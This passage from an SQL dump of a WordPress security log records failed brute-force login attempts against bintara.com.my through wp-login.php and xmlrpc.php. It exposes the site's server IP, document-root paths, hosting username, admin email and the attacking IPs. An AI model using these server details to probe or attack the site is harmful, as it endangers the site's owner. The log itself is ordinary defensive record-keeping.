13:34:07',17740808,19232400,'https://bintara.com.my/wp-login.php',1,0,'162.144.134.39'),(24568,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"138.68.136.152\";s:11:\"REMOTE_PORT\";s:5:\"41766\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYDd6pS9022wVwVSW96YWQAAABI\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568726506.577\";s:12:\"REQUEST_TIME\";s:10:\"1568726506\";}}','notice','2019-09-17 13:21:48','2019-09-17 13:21:46',18255928,19553296,'https://bintara.com.my/xmlrpc.php',1,0,'138.68.136.152'),(24567,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"138.68.136.152\";s:11:\"REMOTE_PORT\";s:5:\"41106\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYDd51d3b0tfDgYOg7gCVAAAAIo\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568726503.1135\";s:12:\"REQUEST_TIME\";s:10:\"1568726503\";}}','notice','2019-09-17 13:21:44','2019-09-17 13:21:43',17739992,19230320,'https://bintara.com.my/wp-login.php',1,0,'138.68.136.152'),(24566,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"144.217.75.27\";s:11:\"REMOTE_PORT\";s:5:\"35314\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYDdO1d3b0tfDgYOg7gBywAAAJA\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568726331.8707\";s:12:\"REQUEST_TIME\";s:10:\"1568726331\";}}','notice','2019-09-17 13:18:53','2019-09-17 13:18:52',18256968,19556512,'https://bintara.com.my/xmlrpc.php',1,0,'144.217.75.27'),(24565,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"144.217.75.27\";s:11:\"REMOTE_PORT\";s:5:\"34388\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYDdOJS9022wVwVSW96YLQAAABU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568726328.7433\";s:12:\"REQUEST_TIME\";s:10:\"1568726328\";}}','notice','2019-09-17 13:18:50','2019-09-17 13:18:49',17906024,19230672,'https://bintara.com.my/wp-login.php',1,0,'144.217.75.27'),(24564,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"144.217.75.27\";s:11:\"REMOTE_PORT\";s:5:\"34388\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYDdOJS9022wVwVSW96YLQAAABU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568726328.7433\";s:12:\"REQUEST_TIME\";s:10:\"1568726328\";}}','notice','2019-09-17 13:18:50','2019-09-17 13:18:49',17744384,19230672,'https://bintara.com.my/wp-login.php',1,0,'144.217.75.27'),(24563,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"164.132.100.13\";s:11:\"REMOTE_PORT\";s:5:\"45312\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYDbWVd3b0tfDgYOg7gAkwAAAIg\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568725849.3724\";s:12:\"REQUEST_TIME\";s:10:\"1568725849\";}}','notice','2019-09-17 13:10:50','2019-09-17 13:10:49',18256056,19554968,'https://bintara.com.my/xmlrpc.php',1,0,'164.132.100.13'),(24562,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"164.132.100.13\";s:11:\"REMOTE_PORT\";s:5:\"44905\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYDbVg99C9j9bhK9KplgmwAAAQg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568725846.4141\";s:12:\"REQUEST_TIME\";s:10:\"1568725846\";}}','notice','2019-09-17 13:10:48','2019-09-17 13:10:46',17907416,19231816,'https://bintara.com.my/wp-login.php',1,0,'164.132.100.13'),(24561,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"164.132.100.13\";s:11:\"REMOTE_PORT\";s:5:\"44905\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYDbVg99C9j9bhK9KplgmwAAAQg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568725846.4141\";s:12:\"REQUEST_TIME\";s:10:\"1568725846\";}}','notice','2019-09-17 13:10:47','2019-09-17 13:10:46',17745392,19231816,'https://bintara.com.my/wp-login.php',1,0,'164.132.100.13'),(24560,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"51.77.64.186\";s:11:\"REMOTE_PORT\";s:5:\"45728\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYDanld3b0tfDgYOg7gAAAAAAI4\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568725662.8412\";s:12:\"REQUEST_TIME\";s:10:\"1568725662\";}}','notice','2019-09-17 13:07:44','2019-09-17 